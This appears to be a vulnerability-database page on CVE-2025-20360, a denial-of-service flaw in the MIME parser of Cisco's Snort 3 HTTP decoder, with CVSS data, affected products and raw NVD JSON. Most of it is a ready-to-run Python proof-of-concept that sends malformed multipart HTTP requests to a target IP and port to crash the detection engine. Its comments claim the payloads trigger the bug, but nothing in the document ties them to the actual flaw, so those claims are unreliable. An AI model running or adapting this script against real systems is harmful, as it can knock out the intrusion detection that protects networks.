Security Vulnerability Report
CVE-2025-20360 CVSS 5.8 MEDIUM

CVE-2025-20360

Published: 2025-10-15 17:15:49
Last Modified: 2026-04-15 00:35:42

Description

Multiple Cisco products are affected by a vulnerability in the Snort 3 HTTP Decoder that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to restart. This vulnerability is due to a lack of complete error checking when the MIME fields of the HTTP header are parsed. An attacker could exploit this vulnerability by sending crafted HTTP packets through an established connection to be parsed by Snort 3. A successful exploit could allow the attacker to cause a DoS condition when the Snort 3 Detection Engine unexpectedly restarts.

CVSS Details

CVSS Score: 5.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

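Cisco Snort 3 (for the affected version range, refer to Cisco's official security advisory)
Cisco Firepower Management Center
Cisco Firepower Threat Defense (FTD)
Cisco Secure Firewall series devices
Other Cisco products that integrate the Snort 3 detection engine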

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-20360 - Cisco Snort 3 HTTP Decoder MIME Parsing DoS PoC
# This PoC demonstrates sending crafted HTTP packets with malformed MIME fields
# to trigger Snort 3 Detection Engine restart (DoS condition).
#
# Usage: python3 cve_2025_20360_poc.py <target_ip> <target_port>

import socket
import sys
import struct


def build_malformed_http_request():
    """
    Build an HTTP request with malformed MIME fields to trigger
    the Snort 3 HTTP decoder vulnerability.

    The malformed Content-Type field contains an excessively long
    boundary parameter that triggers incomplete error checking
    in the MIME parser.
    """
    # Craft a multipart/form-data Content-Type with an extremely long boundary
    # This triggers the lack of complete error checking in MIME field parsing
    long_boundary = "=" * 8192  # Excessively long boundary parameter

    http_payload = (
        "POST /upload HTTP/1.1\r\n"
        "Host: target\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        f"Content-Type: multipart/form-data; boundary{long_boundary}\r\n"
        "Content-Length: 13\r\n"
        "\r\n"
        "--malformed--"
    )
    return http_payload.encode('utf-8')


def build_alternative_mime_exploit():
    """
    Alternative exploit: malformed Content-Disposition with
    invalid filename parameter containing null bytes and special chars.
    """
    payload = (
        "POST /api/upload HTTP/1.1\r\n"
        "Host: target\r\n"
        "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary\r\n"
        "Content-Length: 500\r\n"
        "\r\n"
        "------WebKitFormBoundary\r\n"
        "Content-Disposition: form-data; name=\"file\"; filename=\"\x00\xff\xfe\xfd\xfc\xfb\xfa\xf9\xf8\xf7\xf6\xf5\xf4\xf3\xf2\xf1\xf0.txt\"\r\n"
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
        "AAAA\r\n"
        "------WebKitFormBoundary--\r\n"
    )
    return payload.encode('latin-1')


def send_exploit(target_ip, target_port):
    """Send the crafted HTTP packet to the target."""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))

        # Send the malformed HTTP request
        payload = build_malformed_http_request()
        print(f"[*] Sending malformed MIME field payload ({len(payload)} bytes) to {target_ip}:{target_port}")
        sock.send(payload)

        # Also send the alternative exploit
        payload2 = build_alternative_mime_exploit()
        print(f"[*] Sending alternative MIME exploit payload ({len(payload2)} bytes)")
        sock.send(payload2)

        # Wait for response or connection drop (indicating Snort restart)
        try:
            response = sock.recv(4096)
            print(f"[*] Received response: {response[:100]}")
        except socket.timeout:
            print("[*] Connection timed out - possible Snort 3 Detection Engine restart triggered!")
        except ConnectionResetError:
            print("[*] Connection reset - Snort 3 Detection Engine likely crashed!")

        sock.close()
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_ip> <target_port>")
        print(f"Example: {sys.argv[0]} 192.168.1.100 80")
        sys.exit(1)

    target_ip = sys.argv[1]
    target_port = int(sys.argv[2])

    print("=" * 60)
    print("CVE-2025-20360 - Cisco Snort 3 HTTP Decoder DoS PoC")
    print("=" * 60)

    send_exploit(target_ip, target_port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20360", "sourceIdentifier": "[email protected]", "published": "2025-10-15T17:15:49.433", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple Cisco products are affected by a vulnerability in the Snort 3 HTTP Decoder that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to restart.\r\n\r\nThis vulnerability is due to a lack of complete error checking when the MIME fields of the HTTP header are parsed. An attacker could exploit this vulnerability by sending crafted HTTP packets through an established connection to be parsed by Snort 3. A successful exploit could allow the attacker to cause a DoS condition when the Snort 3 Detection Engine unexpectedly restarts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-805"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-mime-vulns-tTL8PgVH", "source": "[email protected]"}]}}